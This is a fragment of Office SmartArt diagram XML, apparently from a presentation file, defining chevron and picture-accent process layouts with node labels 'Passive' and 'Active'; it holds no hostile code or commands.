      <dgm:prSet presAssocID="{32CCB050-072A-41BF-BE1B-388CF53E5629}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="7">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7">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7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F54B493-FCA8-4A1F-A2B1-FCB26CA9C396}" type="pres">
      <dgm:prSet presAssocID="{9E838AE2-4659-4603-ABC8-58DF4222C0D4}" presName="desTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D73F5E39-8993-4D6C-9D92-8E8F41E329B8}" type="pres">
      <dgm:prSet presAssocID="{9E838AE2-4659-4603-ABC8-58DF4222C0D4}" presName="EmptyPlaceHolder" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6298174E-DB7D-45A8-B82D-68DBBBE52AB1}" type="pres">
      <dgm:prSet presAssocID="{61F1BCD3-232D-4C03-B56C-182BCB6108CD}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1FA4685-87AF-473F-8000-191B0700271E}" type="pres">
      <dgm:prSet presAssocID="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C91FF04E-3EE2-4CF2-B76D-85E04F7A3B29}" type="pres">
      <dgm:prSet presAssocID="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" presName="L" presStyleLbl="solidFgAcc1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5B600BC4-FC3D-4651-897E-1F5668327DF6}" type="pres">
      <dgm:prSet presAssocID="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12E40988-FBA8-44BD-A1AA-6B0901462602}" type="pres">
      <dgm:prSet presAssocID="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" presName="desTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE9C2929-F8A7-47C8-A9C6-84329CB62FA2}" type="pres">
      <dgm:prSet presAssocID="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" presName="EmptyPlaceHolder" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12F053A8-D9C7-48D5-8039-D11DC5F96CDD}" type="pres">
      <dgm:prSet presAssocID="{FE35B69B-B7CB-4434-B985-DFF4578C2BE8}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3662C68D-518D-4BA2-B9D7-6C68DE9DFC25}" type="pres">
      <dgm:prSet presAssocID="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0F8C385-32EE-47D9-AF69-CCE9AA18FC57}" type="pres">
      <dgm:prSet presAssocID="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" presName="L" presStyleLbl="solidFgAcc1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{059B3449-B318-4AAC-9393-033B4E62F19B}" type="pres">
      <dgm:prSet presAssocID="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04B08F9A-0351-430E-ABAC-E31DBA861B76}" type="pres">
      <dgm:prSet presAssocID="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" presName="desTx" presStyleLbl="revTx" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A323037-71C7-4D08-89AA-2D928AAF51AE}" type="pres">
      <dgm:prSet presAssocID="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" presName="EmptyPlaceHolder" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{FCD72718-BB30-4E7F-82FB-1C98E7546C31}" type="presOf" srcId="{B4345CFE-3004-4D24-B6C2-C67D1EED219B}" destId="{7F54B493-FCA8-4A1F-A2B1-FCB26CA9C396}" srcOrd="0" destOrd="1"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46C56F21-4110-4E10-8397-1892EDCE559C}" type="presOf" srcId="{86FD68DD-D247-4303-8997-5C9A9F43FECE}" destId="{7F54B493-FCA8-4A1F-A2B1-FCB26CA9C396}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{1817C62D-0D73-4E47-B7D6-AE086C396641}" srcId="{55C0B14E-AEA6-48D3-A387-ED4A3A3BF840}" destId="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" srcOrd="6" destOrd="0" parTransId="{91CF1FEA-9B1F-41C9-BD47-F12398EF396E}" sibTransId="{7A85F317-9C5E-4F83-B1E6-E2E4FC322255}"/>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9236AB70-3B4B-494C-AC82-2AB658947CD1}" type="presOf" srcId="{7E240D90-8E1A-4F63-B4BF-AD836BC8CABE}" destId="{059B3449-B318-4AAC-9393-033B4E62F19B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{BA0ABA76-FF18-4415-849F-D4B38C350E93}" srcId="{9E838AE2-4659-4603-ABC8-58DF4222C0D4}" destId="{B4345CFE-3004-4D24-B6C2-C67D1EED219B}" srcOrd="1" destOrd="0" parTransId="{9F207147-3561-472E-92A2-6FEF8ECD07D7}" sibTransId="{717FDA12-8F8C-4D3C-AB00-E43DAE2A4310}"/>
    <dgm:cxn modelId="{219EA357-E48B-4A91-91A7-8282DFF10601}" type="presOf" srcId="{55C0B14E-AEA6-48D3-A387-ED4A3A3BF840}" destId="{594BF422-752C-42F3-A230-3D0E6AE9A886}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{020EFE77-4B55-461E-B919-97D7B3DA6E8D}" srcId="{9E838AE2-4659-4603-ABC8-58DF4222C0D4}" destId="{86FD68DD-D247-4303-8997-5C9A9F43FECE}" srcOrd="0" destOrd="0" parTransId="{B65E2892-57B2-4F6C-9E9B-C595F9A598FB}" sibTransId="{E25E5E0E-9826-47E4-8DF9-BCB8A45D3729}"/>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72BDC9B2-4AB6-497C-AEDF-EC50A6AEF085}" type="presOf" srcId="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" destId="{5B600BC4-FC3D-4651-897E-1F5668327DF6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{2F6485B4-0735-4D01-8060-5A89B7562619}" type="presOf" srcId="{5D70EFF5-8B31-4A1F-AE44-51E4CF0013EB}" destId="{5E07F9E4-149C-4A89-848F-4ABDD305F0C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{6D7998BB-4F79-4AAA-AC1D-81C4BA510D64}" srcId="{55C0B14E-AEA6-48D3-A387-ED4A3A3BF840}" destId="{790D3BF4-F696-4B4B-9646-FDD001B1295D}" srcOrd="5" destOrd="0" parTransId="{AEEDC74F-8E18-4816-B12B-06BF07A8F850}" sibTransId="{FE35B69B-B7CB-4434-B985-DFF4578C2BE8}"/>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 modelId="{FE5C6F5F-9487-4609-BA25-E7C6F18FF87D}" type="presParOf" srcId="{594BF422-752C-42F3-A230-3D0E6AE9A886}" destId="{6298174E-DB7D-45A8-B82D-68DBBBE52AB1}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{65A8AAF6-2C39-49E8-ABB3-F0341A23E0DE}" type="presParOf" srcId="{594BF422-752C-42F3-A230-3D0E6AE9A886}" destId="{C1FA4685-87AF-473F-8000-191B0700271E}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{65F59BB3-A451-4E9B-9704-BC9533639F14}" type="presParOf" srcId="{C1FA4685-87AF-473F-8000-191B0700271E}" destId="{C91FF04E-3EE2-4CF2-B76D-85E04F7A3B29}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{A7A4FC06-27D5-4D5B-9E46-03C4E96F55C9}" type="presParOf" srcId="{C1FA4685-87AF-473F-8000-191B0700271E}" destId="{5B600BC4-FC3D-4651-897E-1F5668327DF6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{9FCDF2A8-1F96-44FD-9D0E-31798A4CF2A2}" type="presParOf" srcId="{C1FA4685-87AF-473F-8000-191B0700271E}" destId="{12E40988-FBA8-44BD-A1AA-6B0901462602}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{8E27EAE4-4D84-4AD4-8D6D-67588199DAC6}" type="presParOf" srcId="{C1FA4685-87AF-473F-8000-191B0700271E}" destId="{BE9C2929-F8A7-47C8-A9C6-84329CB62FA2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{10E381A0-25CD-405B-B990-1BC9A51CC9D3}" type="presParOf" srcId="{594BF422-752C-42F3-A230-3D0E6AE9A886}" destId="{12F053A8-D9C7-48D5-8039-D11DC5F96CDD}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{0B54860B-47B8-45C7-BA79-C5D7F7D50E86}" type="presParOf" srcId="{594BF422-752C-42F3-A230-3D0E6AE9A886}" destId="{3662C68D-518D-4BA2-B9D7-6C68DE9DFC25}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{AADE6BC6-D215-4BED-A9A4-9FA707087BE7}" type="presParOf" srcId="{3662C68D-518D-4BA2-B9D7-6C68DE9DFC25}" destId="{A0F8C385-32EE-47D9-AF69-CCE9AA18FC57}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{65CDD046-D067-412A-9AA6-DD052375CB39}" type="presParOf" srcId="{3662C68D-518D-4BA2-B9D7-6C68DE9DFC25}" destId="{059B3449-B318-4AAC-9393-033B4E62F19B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{25B6A6EE-6A31-4B5A-9E78-0333D36165B4}" type="presParOf" srcId="{3662C68D-518D-4BA2-B9D7-6C68DE9DFC25}" destId="{04B08F9A-0351-430E-ABAC-E31DBA861B76}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/AccentHomeChevronProcess"/>
    <dgm:cxn modelId="{A0B25B1F-7810-43AE-AE96-417AED7E3FE1}" type="presParOf" srcId="{3662C68D-518D-4BA2-B9D7-6C68DE9DFC25}" destId="{0A323037-71C7-4D08-89AA-2D928AAF51A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E9EE90-ECA2-476C-BB94-E61E3F7AB0F3}"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pPr rtl="1"/>
          <a:endParaRPr lang="ar-EG"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{234C10D2-9240-4D37-A697-BF61C9DD8C11}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t>Passive</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="ar-EG" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE94ED46-263E-4248-8602-C434407ADACF}" type="parTrans" cxnId="{A17F5A6F-41BF-4E69-BBC3-E46015AF1861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:endParaRPr lang="ar-EG"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F6091CF-4479-4666-BC57-D44C9FCCEC53}" type="sibTrans" cxnId="{A17F5A6F-41BF-4E69-BBC3-E46015AF1861}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:endParaRPr lang="ar-EG">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
      <dgm:extLst>
        <a:ext uri="{E40237B7-FDA0-4F09-8148-C483321AD2D9}">
          <dgm14:cNvPr xmlns:dgm14="http://schemas.microsoft.com/office/drawing/2010/diagram" id="0" name="" descr="Presentation with bar chart RTL"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{FE9F4452-6525-442E-8712-6FE8334DCE40}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t>Active</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="ar-EG" dirty="0">
            <a:effectLst>
              <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                <a:srgbClr val="000000">
                  <a:alpha val="43137"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A18A6A6C-84AC-4827-87D5-0F2193367450}" type="parTrans" cxnId="{95F2212E-7A26-4847-B8F3-3AF356D916B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:endParaRPr lang="ar-EG"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36252265-9CF3-4D08-8E95-B1047691B427}" type="sibTrans" cxnId="{95F2212E-7A26-4847-B8F3-3AF356D916B0}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:endParaRPr lang="ar-EG"/>
        </a:p>
      </dgm:t>
      <dgm:extLst>
        <a:ext uri="{E40237B7-FDA0-4F09-8148-C483321AD2D9}">
          <dgm14:cNvPr xmlns:dgm14="http://schemas.microsoft.com/office/drawing/2010/diagram" id="0" name="" descr="Bullseye"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{324BF386-BD40-4573-8304-2143A362BDE4}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{847D46DC-7F1A-4B06-9950-F3FB6B9DADC7}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dot1" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21065562-C697-463B-9032-081255759F2E}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dot2" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CAE029F9-92C6-4CFE-B9AC-3294735DFDDF}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dot3" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{31290798-58EF-412B-8B72-BD65A97F3AF0}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow1" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E4771788-5293-431A-9534-C7627A5893A2}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow2" presStyleLbl="alignNode1" presStyleIdx="4" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77F01D5A-3E1D-43C5-B723-6FE940A2FFF8}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow3" presStyleLbl="alignNode1" presStyleIdx="5" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74DE8A9A-E4B3-4A40-99E1-D009B6D019FF}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow4" presStyleLbl="alignNode1" presStyleIdx="6" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D507DE6-46CE-4183-A624-2464E4F0B38F}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow5" presStyleLbl="alignNode1" presStyleIdx="7" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDC5DF38-FC13-4BA9-B43D-712E919B0B04}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow6" presStyleLbl="alignNode1" presStyleIdx="8" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F19DE74C-EB7A-4EE3-AAF1-56900FFA3243}" type="pres">
      <dgm:prSet presAssocID="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" presName="dotArrow7" presStyleLbl="alignNode1" presStyleIdx="9" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F7B09D3F-E917-4C42-BD5D-FCB0F785F4F6}" type="pres">
      <dgm:prSet presAssocID="{234C10D2-9240-4D37-A697-BF61C9DD8C11}" presName="parTx1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{38A0FCA7-8BE1-41EF-B620-54E99AD5469B}" type="pres">
      <dgm:prSet presAssocID="{3F6091CF-4479-4666-BC57-D44C9FCCEC53}" presName="picture1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7C93A68-5DD0-4203-8711-D6FC8B125DAC}" type="pres">
      <dgm:prSet presAssocID="{3F6091CF-4479-4666-BC57-D44C9FCCEC53}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborX="18545" custLinFactNeighborY="23074"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53120260-8853-4E86-8AC9-8510FD44780A}" type="pres">
      <dgm:prSet presAssocID="{FE9F4452-6525-442E-8712-6FE8334DCE40}" presName="parTx2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D7CF3BC9-D05F-4D81-8E15-BBF97AF5D061}" type="pres">
      <dgm:prSet presAssocID="{36252265-9CF3-4D08-8E95-B1047691B427}" presName="picture2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{414B2161-725B-47BF-B965-6ADDF0971D65}" type="pres">
      <dgm:prSet presAssocID="{36252265-9CF3-4D08-8E95-B1047691B427}" presName="imageRepeatNode" presStyleLbl="fgImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{2D20CF10-8477-44F9-806F-447115CCB815}" type="presOf" srcId="{36252265-9CF3-4D08-8E95-B1047691B427}" destId="{414B2161-725B-47BF-B965-6ADDF0971D65}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{95F2212E-7A26-4847-B8F3-3AF356D916B0}" srcId="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" destId="{FE9F4452-6525-442E-8712-6FE8334DCE40}" srcOrd="1" destOrd="0" parTransId="{A18A6A6C-84AC-4827-87D5-0F2193367450}" sibTransId="{36252265-9CF3-4D08-8E95-B1047691B427}"/>
    <dgm:cxn modelId="{226F464B-3C6D-4F08-9559-D37DB2BCA4BB}" type="presOf" srcId="{234C10D2-9240-4D37-A697-BF61C9DD8C11}" destId="{F7B09D3F-E917-4C42-BD5D-FCB0F785F4F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{A17F5A6F-41BF-4E69-BBC3-E46015AF1861}" srcId="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" destId="{234C10D2-9240-4D37-A697-BF61C9DD8C11}" srcOrd="0" destOrd="0" parTransId="{FE94ED46-263E-4248-8602-C434407ADACF}" sibTransId="{3F6091CF-4479-4666-BC57-D44C9FCCEC53}"/>
    <dgm:cxn modelId="{99AA5E80-B61E-43C9-8B93-FA11B332E7E9}" type="presOf" srcId="{6BE9EE90-ECA2-476C-BB94-E61E3F7AB0F3}" destId="{324BF386-BD40-4573-8304-2143A362BDE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{CCA55E82-DE1E-48BE-988C-B330E9394B10}" type="presOf" srcId="{3F6091CF-4479-4666-BC57-D44C9FCCEC53}" destId="{D7C93A68-5DD0-4203-8711-D6FC8B125DAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{6D98ABBD-1402-4F83-9424-805142739C25}" type="presOf" srcId="{FE9F4452-6525-442E-8712-6FE8334DCE40}" destId="{53120260-8853-4E86-8AC9-8510FD44780A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{88F3CC60-3508-47A3-AFF5-1C0A984E3004}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{847D46DC-7F1A-4B06-9950-F3FB6B9DADC7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{6A20893E-5D94-44A4-A499-337A41C4DFE7}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{21065562-C697-463B-9032-081255759F2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{8D1E089C-FCCA-43CE-A389-1FCB5935D69A}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{CAE029F9-92C6-4CFE-B9AC-3294735DFDDF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{4E55ED34-65CD-4850-9B45-8753D01FA944}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{31290798-58EF-412B-8B72-BD65A97F3AF0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{C21443DA-A07C-4A72-8302-6CC903BB10FA}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{E4771788-5293-431A-9534-C7627A5893A2}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{4F1413B9-34D8-4B86-BBA3-C0208F19BCEC}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{77F01D5A-3E1D-43C5-B723-6FE940A2FFF8}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{74B55C9F-F150-4C09-A186-AC27FF4039D3}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{74DE8A9A-E4B3-4A40-99E1-D009B6D019FF}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{78091DFF-5817-4D81-B950-060ED6849024}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{3D507DE6-46CE-4183-A624-2464E4F0B38F}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{52D875B1-5338-4584-A622-6480F62EB5A0}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{EDC5DF38-FC13-4BA9-B43D-712E919B0B04}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
    <dgm:cxn modelId="{C0C5C107-3C27-4333-AE83-BCB51FA45B3B}" type="presParOf" srcId="{324BF386-BD40-4573-8304-2143A362BDE4}" destId="{F19DE74C-EB7A-4EE3-AAF1-56900FFA3243}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/AscendingPictureAccentProcess"/>
